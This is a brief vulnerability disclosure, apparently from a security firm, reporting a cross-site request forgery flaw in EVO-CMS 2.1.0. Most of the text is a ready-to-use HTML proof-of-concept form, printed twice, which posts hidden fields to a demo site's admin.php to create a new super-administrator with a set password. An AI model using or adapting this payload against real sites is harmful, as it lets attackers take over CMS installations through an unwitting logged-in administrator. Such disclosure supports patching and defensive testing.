# Affected software:  evo cms
# Type of vulnerability: adding new admin (csrf)
# URL: http://www.evo-german.com/
# Discovered by: Provensec
# Website: http://www.provensec.com
#version:EVO-CMS 2.1.0
# Proof of concept

attacker was able to add new admin as there were no protection against csrf


poc

<html>

  <body>
    <form action="http://demo.opensourcecms.com/evocms/admin.php" method="POST">
      <input type="hidden" name="authors&#91;add&#95;name&#93;" value="test" />
      <input type="hidden" name="authors&#91;add&#95;aid&#93;"
value="test123" />
      <input type="hidden" name="authors&#91;add&#95;email&#93;"
value="test&#64;gmail&#46;com" />
      <input type="hidden" name="authors&#91;add&#95;url&#93;"
value="http://demo.opensourcecms.com/evocms/" />
      <input type="hidden" name="authors&#91;add&#95;admlanguage&#93;"
value="english" />
      <input type="hidden" name="authors&#91;add&#95;radminsuper&#93;"
value="1" />
      <input type="hidden" name="authors&#91;add&#95;pwd&#93;"
value="test123" />
      <input type="hidden" name="authors&#91;add&#95;pwd2&#93;"
value="test123" />
      <input type="hidden" name="op" value="addadmin" />
      <input type="hidden" name="module" value="authors" />
      <input type="hidden" name="submit" value="Create&#32;Administrator" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>











poc:

<html>

  <body>
    <form action="http://demo.opensourcecms.com/evocms/admin.php" method="POST">
      <input type="hidden" name="authors&#91;add&#95;name&#93;" value="test" />
      <input type="hidden" name="authors&#91;add&#95;aid&#93;"
value="test123" />
      <input type="hidden" name="authors&#91;add&#95;email&#93;"
value="test&#64;gmail&#46;com" />
      <input type="hidden" name="authors&#91;add&#95;url&#93;"
value="http://demo.opensourcecms.com/evocms/" />
      <input type="hidden" name="authors&#91;add&#95;admlanguage&#93;"
value="english" />
      <input type="hidden" name="authors&#91;add&#95;radminsuper&#93;"
value="1" />
      <input type="hidden" name="authors&#91;add&#95;pwd&#93;"
value="test123" />
      <input type="hidden" name="authors&#91;add&#95;pwd2&#93;"
value="test123" />
      <input type="hidden" name="op" value="addadmin" />
      <input type="hidden" name="module" value="authors" />
      <input type="hidden" name="submit" value="Create&#32;Administrator" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>